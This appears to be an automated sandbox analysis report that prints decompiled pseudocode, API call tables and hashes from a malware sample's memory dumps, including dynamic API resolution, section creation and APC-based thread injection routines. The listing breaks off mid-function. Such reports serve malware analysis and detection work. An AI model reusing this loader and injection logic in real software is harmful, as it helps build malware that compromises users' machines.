                • Instruction Fuzzy Hash: CA414AB1A00605EFDB11EF66C8849AEBBF5FF58300B10852EE9159B250E774FA41CFA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C121FA Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E01C121FA(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E01C12114(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x1c1a2d8; // 0x55d5a8
					_t1 = _t23 + 0x1c1b11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x1c1a2d8; // 0x55d5a8
					_t2 = _t26 + 0x1c1b782; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E01C12C11(_t54);
					} else {
						_t30 =  *0x1c1a2d8; // 0x55d5a8
						_t5 = _t30 + 0x1c1b76f; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x1c1a2d8; // 0x55d5a8
							_t7 = _t33 + 0x1c1b4ce; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x1c1a2d8; // 0x55d5a8
								_t9 = _t36 + 0x1c1b406; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x1c1a2d8; // 0x55d5a8
									_t11 = _t39 + 0x1c1b792; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E01C12F8D(_t54, _a8); // executed
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                0x01c12209
                0x01c1220d
                0x01c122cf
                0x01c12213
                0x01c12213
                0x01c12218
                0x01c1222b
                0x01c1222d
                0x01c12232
                0x01c1223a
                0x01c12241
                0x01c12245
                0x01c12248
                0x01c122c7
                0x01c122c8
                0x01c1224a
                0x01c1224a
                0x01c1224f
                0x01c12257
                0x01c1225b
                0x01c1225e
                0x00000000
                0x01c12260
                0x01c12260
                0x01c12265
                0x01c1226d
                0x01c12271
                0x01c12274
                0x00000000
                0x01c12276
                0x01c12276
                0x01c1227b
                0x01c12283
                0x01c12287
                0x01c1228a
                0x00000000
                0x01c1228c
                0x01c1228c
                0x01c12291
                0x01c12299
                0x01c1229d
                0x01c122a0
                0x00000000
                0x01c122a2
                0x01c122a8
                0x01c122ad
                0x01c122b4
                0x01c122bb
                0x01c122be
                0x00000000
                0x01c122c0
                0x01c122c3
                0x01c122c3
                0x01c122be
                0x01c122a0
                0x01c1228a
                0x01c12274
                0x01c1225e
                0x01c12248
                0x01c122dd

                APIs
                  • Part of subcall function 01C12114: RtlAllocateHeap.NTDLL(00000000,00000000,01C16F72), ref: 01C12120
                • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,01C1122E,?,?,?,?,00000000,00000000), ref: 01C1221F
                • GetProcAddress.KERNEL32(00000000,7243775A), ref: 01C12241
                • GetProcAddress.KERNEL32(00000000,614D775A), ref: 01C12257
                • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 01C1226D
                • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 01C12283
                • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 01C12299
                  • Part of subcall function 01C12F8D: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74E04EE0,00000000,00000000,01C122B9), ref: 01C12FEA
                  • Part of subcall function 01C12F8D: memset.NTDLL ref: 01C1300C
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                • String ID:
                • API String ID: 3012371009-0
                • Opcode ID: ae4a5ee4dbb98c7c6844c6c7fa83e13ba1221278f990e4acec299fc44d4e180b
                • Instruction ID: e82d943f4e4b69c3a1718e4da648c6cf223eadb4fc5867ffbd28bac0bedbe8c4
                • Opcode Fuzzy Hash: ae4a5ee4dbb98c7c6844c6c7fa83e13ba1221278f990e4acec299fc44d4e180b
                • Instruction Fuzzy Hash: 5C2191B558020AEFD720DFA9C884F9A7BFCFB1A654B144515E609C7215E770EA04DF70
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C87CD Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,046CA90D,?,?,?,00000000,00000000), ref: 046C87F2
                • GetProcAddress.KERNEL32(00000000,?), ref: 046C8814
                • GetProcAddress.KERNEL32(00000000,?), ref: 046C882A
                • GetProcAddress.KERNEL32(00000000,?), ref: 046C8840
                • GetProcAddress.KERNEL32(00000000,?), ref: 046C8856
                • GetProcAddress.KERNEL32(00000000,?), ref: 046C886C
                  • Part of subcall function 046DBEBC: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74E04EE0,00000000,00000000), ref: 046DBF19
                  • Part of subcall function 046DBEBC: memset.NTDLL ref: 046DBF3D
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                • String ID:
                • API String ID: 3012371009-0
                • Opcode ID: 9884e10ac3b6cf853928977b4c76b9af6d3ea05e2f41cdf9fd0768f547c1e6f4
                • Instruction ID: a232829454814d7ea7ba410fe413ed42829420daf66edbbf082827a49f92ddf2
                • Opcode Fuzzy Hash: 9884e10ac3b6cf853928977b4c76b9af6d3ea05e2f41cdf9fd0768f547c1e6f4
                • Instruction Fuzzy Hash: 54212DB1A0220AEFD720EF69C948E6A77ECEB046847058569E909CB651F739F9058B60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D9DC6 Relevance: 9.0, APIs: 6, Instructions: 32threadinjectionCOMMON
                Download Yara Rule
                APIs
                • CreateThread.KERNELBASE(00000000,00000000,00000000,?,00000000,046D2BEA), ref: 046D9DDD
                • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 046D9DF2
                • GetLastError.KERNEL32(00000000), ref: 046D9DFD
                • TerminateThread.KERNEL32(00000000,00000000), ref: 046D9E07
                • CloseHandle.KERNEL32(00000000), ref: 046D9E0E
                • SetLastError.KERNEL32(00000000), ref: 046D9E17
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                • String ID:
                • API String ID: 3832013932-0
                • Opcode ID: 68cffa5c6b6e2e882e1000bffb5505bb03443d29f6c895b31499679aa941fb3e
                • Instruction ID: 73006fb66f74afdb6416620ada9f4452a808361c730302c146e97c25c788a9d0
                • Opcode Fuzzy Hash: 68cffa5c6b6e2e882e1000bffb5505bb03443d29f6c895b31499679aa941fb3e
                • Instruction Fuzzy Hash: 7FF01232505222EBD7212FA2AD08F9BBBE9FF19751F04540CF6019B154E73A9D109BA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C11B78 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167stringCOMMON
                Download Yara Rule
                C-Code - Quality: 88%
                			E01C11B78(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				void* _t62;
				intOrPtr _t64;
				char _t65;
				void* _t67;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x1c1a39c);
					_t91 = 0x80000002;
					L6:
					_t59 = E01C123CC( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					_t62 = E01C177FE(_t92, _t97, _t101, _t91, _t59); // executed
					if(_t62 != 0) {
						L27:
						E01C12C11(_a8);
						goto L29;
					}
					_t64 =  *0x1c1a2d0; // 0x2179b30
					_t16 = _t64 + 0xc; // 0x2179bfe
					_t65 = E01C123CC(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d01c190, executed
						_t67 = E01C15173(_t97,  *_t33, _t91, _a8,  *0x1c1a394,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))); // executed
						if(_t67 == 0) {
							_t68 =  *0x1c1a2d8; // 0x55d5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x1c1ba48; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x1c1ba43; // 0x55434b48
								_t69 = _t34;
							}
							if(E01C13964(_t69,  *0x1c1a394,  *0x1c1a398,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x1c1a2d8; // 0x55d5a8
									_t44 = _t71 + 0x1c1b83e; // 0x74666f53
									_t73 = E01C123CC(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d01c190
										E01C12BC9( *_t47, _t91, _a8,  *0x1c1a398, _a24);
										_t49 = _t101 + 0x10; // 0x3d01c190
										E01C12BC9( *_t49, _t91, _t99,  *0x1c1a390, _a16);
										E01C12C11(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d01c190
									E01C12BC9( *_t40, _t91, _a8,  *0x1c1a398, _a24);
									_t43 = _t101 + 0x10; // 0x3d01c190
									E01C12BC9( *_t43, _t91, _a8,  *0x1c1a390, _a16);
								}
								if( *_t101 != 0) {
									E01C12C11(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d01c190, executed
					_t81 = E01C155E9( *_t21, _t91, _a8, _t65,  &_v16,  &_v12); // executed
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d01c190
							E01C15173(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E01C12C11(_t100);
						_t98 = _a16;
					}
					E01C12C11(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E01C17A9C(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x1c1a39c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}

























                0x01c11b78
                0x01c11b81
                0x01c11b88
                0x01c11b8d
                0x01c11bfa
                0x01c11c00
                0x01c11c05
                0x01c11c0c
                0x01c11c13
                0x01c11c16
                0x01c11d81
                0x01c11d88
                0x01c11d88
                0x01c11d8d
                0x01c11d8f
                0x01c11d8f
                0x01c11d98
                0x01c11d98
                0x01c11c1c
                0x01c11c21
                0x01c11c28
                0x01c11d77
                0x01c11d7a
                0x00000000
                0x01c11d7a
                0x01c11c2e
                0x01c11c33
                0x01c11c36
                0x01c11c3d
                0x01c11c40
                0x01c11c89
                0x01c11c89
                0x01c11c9c
                0x01c11c9f
                0x01c11ca6
                0x01c11cae
                0x01c11cb3
                0x01c11cbd
                0x01c11cbd
                0x01c11cb5
                0x01c11cb5
                0x01c11cb5
                0x01c11cb5
                0x01c11cdf
                0x01c11ce7
                0x01c11d15
                0x01c11d1a
                0x01c11d21
                0x01c11d26
                0x01c11d2a
                0x01c11d5c
                0x01c11d2c
                0x01c11d39
                0x01c11d3c
                0x01c11d4c
                0x01c11d4f
                0x01c11d55
                0x01c11d55
                0x01c11ce9
                0x01c11cf6
                0x01c11cf9
                0x01c11d0b
                0x01c11d0e
                0x01c11d0e
                0x01c11d66
                0x01c11d72
                0x01c11d68
                0x01c11d6b
                0x01c11d6b
                0x01c11d66
                0x01c11cdf
                0x00000000
                0x01c11ca6
                0x01c11c4f
                0x01c11c52
                0x01c11c59
                0x01c11c5f
                0x01c11c62
                0x01c11c64
                0x01c11c70
                0x01c11c73
                0x01c11c73
                0x01c11c79
                0x01c11c7e
                0x01c11c7e
                0x01c11c84
                0x00000000
                0x01c11c84
                0x01c11b92
                0x00000000
                0x01c11bb9
                0x01c11bb9
                0x01c11bc5
                0x01c11bd8
                0x01c11bde
                0x01c11be6
                0x00000000
                0x01c11be6

                APIs
                • StrChrA.SHLWAPI(01C161AC,0000005F,00000000,00000000,00000104), ref: 01C11BAB
                • lstrcpy.KERNEL32(?,?), ref: 01C11BD8
                  • Part of subcall function 01C123CC: lstrlen.KERNEL32(?,00000000,02179B30,00000000,01C13413,02179D0E,69B25F44,?,?,?,?,69B25F44,00000005,01C1A010,4D283A53,?), ref: 01C123D3
                  • Part of subcall function 01C123CC: mbstowcs.NTDLL ref: 01C123FC
                  • Part of subcall function 01C123CC: memset.NTDLL ref: 01C1240E
                  • Part of subcall function 01C12BC9: lstrlenW.KERNEL32(?,?,?,01C11D41,3D01C190,80000002,01C161AC,01C119CD,74666F53,4D4C4B48,01C119CD,?,3D01C190,80000002,01C161AC,?), ref: 01C12BEE
                  • Part of subcall function 01C12C11: RtlFreeHeap.NTDLL(00000000,00000000,01C17013,00000000,?,?,00000000), ref: 01C12C1D
                • lstrcpy.KERNEL32(?,00000000), ref: 01C11BFA
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                • String ID: ($\
                • API String ID: 3924217599-1512714803
                • Opcode ID: f34d3df4431f2366c5f9184a6428531f9bf20442c556c5ec2bcab9cd533c6117
                • Instruction ID: 41d1588e9f03977d2e0a9571f80415316cabd5f2417f731f66fc35e02eb85264
                • Opcode Fuzzy Hash: f34d3df4431f2366c5f9184a6428531f9bf20442c556c5ec2bcab9cd533c6117
                • Instruction Fuzzy Hash: 10518D3618020AEFDF22AFA4DC40EAA7BB9FF5B710F544414FA1592028D739DA25FB51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C17253 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 66%
                			E01C17253(intOrPtr* __eax, void* __ecx, void* __edx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
				void* _v8;
				char _v48;
				void* __edi;
				intOrPtr _t22;
				void* _t26;
				intOrPtr _t30;
				intOrPtr _t37;
				intOrPtr* _t43;
				void* _t44;
				void* _t48;
				intOrPtr* _t49;
				void* _t50;
				intOrPtr _t51;

				_t48 = __edx;
				_t44 = __ecx;
				_t43 = _a16;
				_t49 = __eax;
				_t22 =  *0x1c1a2d8; // 0x55d5a8
				_t2 = _t22 + 0x1c1b682; // 0x657a6973
				wsprintfA( &_v48, _t2,  *__eax,  *_t43);
				_t51 =  *0x1c1a3a0; // 0x2179b20
				_push(0x800);
				_push(0);
				_push( *0x1c1a290);
				if( *0x1c1a2a4 >= 5) {
					_t26 = RtlAllocateHeap(); // executed
					if(_t26 == 0) {
						L6:
						_a4 = 8;
						L7:
						if(_a4 != 0) {
							L10:
							 *0x1c1a2a4 =  *0x1c1a2a4 + 1;
							L11:
							return _a4;
						}
						_t52 = _a16;
						 *_t49 = _a16;
						_t50 = _v8;
						 *_t43 = E01C16576(_t52, _t50); // executed
						_t30 = E01C14F81(_t50, _t52); // executed
						if(_t30 != 0) {
							 *_a8 = _t50;
							 *_a12 = _t30;
							if( *0x1c1a2a4 < 5) {
								 *0x1c1a2a4 =  *0x1c1a2a4 & 0x00000000;
							}
							goto L11;
						}
						_a4 = 0xbf;
						E01C151B1();
						HeapFree( *0x1c1a290, 0, _t50);
						goto L10;
					}
					_t37 = E01C174A5(_a4, _t48, _t51,  &_v48,  &_v8,  &_a16, _t26);
					L5:
					_a4 = _t37;
					goto L7;
				}
				if(RtlAllocateHeap() == 0) {
					goto L6;
				}
				_t37 = E01C14062(_a4, _t44, _t48, _t51,  &_v48,  &_v8,  &_a16, _t38);
				goto L5;
			}
















                0x01c17253
                0x01c17253
                0x01c1725a
                0x01c17261
                0x01c17265
                0x01c1726a
                0x01c17275
                0x01c1727b
                0x01c1728b
                0x01c17290
                0x01c17292
                0x01c17298
                0x01c172bc
                0x01c172c4
                0x01c172e1
                0x01c172e1
                0x01c172e8
                0x01c172ec
                0x01c17326
                0x01c17326
                0x01c1732c
                0x01c17333
                0x01c17333
                0x01c172ee
                0x01c172f1
                0x01c172f3
                0x01c17300
                0x01c17302
                0x01c17309
                0x01c17340
                0x01c17345
                0x01c17347
                0x01c17349
                0x01c17349
                0x00000000
                0x01c17347
                0x01c1730b
                0x01c17312
                0x01c17320
                0x00000000
                0x01c17320
                0x01c172d7
                0x01c172dc
                0x01c172dc
                0x00000000
                0x01c172dc
                0x01c172a2
                0x00000000
                0x00000000
                0x01c172b5
                0x00000000

                APIs
                • wsprintfA.USER32 ref: 01C17275
                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 01C1729A
                  • Part of subcall function 01C14062: GetTickCount.KERNEL32 ref: 01C14076
                  • Part of subcall function 01C14062: wsprintfA.USER32 ref: 01C140C6
                  • Part of subcall function 01C14062: wsprintfA.USER32 ref: 01C140E3
                  • Part of subcall function 01C14062: wsprintfA.USER32 ref: 01C14103
                  • Part of subcall function 01C14062: wsprintfA.USER32 ref: 01C1412F
                  • Part of subcall function 01C14062: HeapFree.KERNEL32(00000000,00000000), ref: 01C14141
                  • Part of subcall function 01C14062: wsprintfA.USER32 ref: 01C14162
                  • Part of subcall function 01C14062: HeapFree.KERNEL32(00000000,00000000), ref: 01C14172
                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 01C172BC
                • HeapFree.KERNEL32(00000000,?,?), ref: 01C17320
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: wsprintf$Heap$Free$Allocate$CountTick
                • String ID: Ut
                • API String ID: 1428766365-8415677
                • Opcode ID: e849aba733561b262ec11c2b7bc4f538ec80d6bd5ce986ebe95a413bd2cec4d5
                • Instruction ID: dbf4039abb45d7556af8aa56685f153b3f937802123cd6d62b0f3542e094ff2c
                • Opcode Fuzzy Hash: e849aba733561b262ec11c2b7bc4f538ec80d6bd5ce986ebe95a413bd2cec4d5
                • Instruction Fuzzy Hash: BF312871581219EFCB11DFA4D984BDA3BBCBF1A354F108016F906A7249DB70DA05EBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C1219A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29sleepmemoryCOMMON
                Download Yara Rule
                C-Code - Quality: 50%
                			E01C1219A(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0x1c1a384; // 0x21795b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x1c1a384; // 0x21795b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x1c1a004) {
					HeapFree( *0x1c1a290, 0, _t8);
				}
				_t9 = E01C11590(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0x1c1a384; // 0x21795b0
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}











                0x01c1219a
                0x01c1219a
                0x01c121a3
                0x01c121b3
                0x01c121b3
                0x01c121b8
                0x01c121bd
                0x00000000
                0x00000000
                0x01c121ad
                0x01c121ad
                0x01c121bf
                0x01c121c3
                0x01c121d5
                0x01c121d5
                0x01c121e0
                0x01c121e5
                0x01c121e8
                0x01c121ed
                0x01c121f1
                0x01c121f7

                APIs
                • RtlEnterCriticalSection.NTDLL(02179570), ref: 01C121A3
                • Sleep.KERNEL32(0000000A), ref: 01C121AD
                • HeapFree.KERNEL32(00000000,00000000), ref: 01C121D5
                • RtlLeaveCriticalSection.NTDLL(02179570), ref: 01C121F1
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                • String ID: Ut
                • API String ID: 58946197-8415677
                • Opcode ID: 2632fa421b92ea512533d9abd98962b3feddc66aca6d9830f4bad7378f82a920
                • Instruction ID: 9256b8832160d8d56eb89542f616849eef44abe1f5345f7b67911e0465bc1f04
                • Opcode Fuzzy Hash: 2632fa421b92ea512533d9abd98962b3feddc66aca6d9830f4bad7378f82a920
                • Instruction Fuzzy Hash: 6EF05E78281280DBEB30CB69D948F163BB8BB27744B244408FA0BC7659D234D950DB15
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C134A2 Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 57%
                			E01C134A2(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				void* _t49;
				void* _t51;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t63;
				CHAR* _t67;
				CHAR* _t68;
				char* _t69;
				void* _t70;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E01C13B98();
				if(_t21 != 0) {
					_t59 =  *0x1c1a2b4; // 0x2000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x1c1a2b4 = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x1c1a148(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E01C15AAB( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x1c1a2d8; // 0x55d5a8
					if( *0x1c1a2b4 > 5) {
						_t8 = _t26 + 0x1c1b5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x1c1b9f9; // 0x44283a44
						_t27 = _t7;
					}
					E01C16CD7(_t27, _t27);
					_t31 = E01C130FD(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t63 = 5;
					if(_t54 != _t63) {
						 *0x1c1a2c8 =  *0x1c1a2c8 ^ 0x81bbe65d;
						_t32 = E01C12114(0x60);
						__eflags = _t32;
						 *0x1c1a384 = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x1c1a384; // 0x21795b0
							_t70 = _t70 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x1c1a384; // 0x21795b0
							 *_t51 = 0x1c1b823;
						}
						__eflags = 0;
						_t54 = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x1c1a290, 0, 0x43);
							__eflags = _t36;
							 *0x1c1a320 = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x1c1a2b4; // 0x2000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x1c1a2d8; // 0x55d5a8
								_t13 = _t58 + 0x1c1b55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x1c192ab);
							}
							__eflags = 0;
							_t54 = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E01C15F8B( ~_v8 &  *0x1c1a2c8, 0x1c1a010); // executed
								_t42 = E01C14BB3(0, _t55, _t63, 0x1c1a010); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E01C133AC(); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t67 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E01C1541F(_t61, _t67, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t67;
									if(__eflags == 0) {
										goto L30;
									}
									_t54 = E01C11E0F(__eflags,  &(_t67[4]));
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t68 = _v12;
						if(_t68 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x1c1a14c(); // executed
							}
							goto L34;
						}
						_t69 =  &(_t68[4]);
						do {
						} while (E01C16096(_t63, _t69, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}































                0x01c134a2
                0x01c134ac
                0x01c134af
                0x01c134b2
                0x01c134b5
                0x01c134bc
                0x01c134be
                0x01c134ca
                0x01c134cc
                0x01c134cc
                0x01c134d5
                0x01c134dd
                0x01c134e0
                0x01c134fa
                0x01c13506
                0x01c13508
                0x01c1350d
                0x01c13517
                0x01c13517
                0x01c1350f
                0x01c1350f
                0x01c1350f
                0x01c1350f
                0x01c1351e
                0x01c1352b
                0x01c13532
                0x01c13537
                0x01c13537
                0x01c13540
                0x01c13543
                0x01c13569
                0x01c13575
                0x01c1357a
                0x01c1357c
                0x01c13581
                0x01c135ad
                0x01c135af
                0x01c13583
                0x01c13587
                0x01c1358c
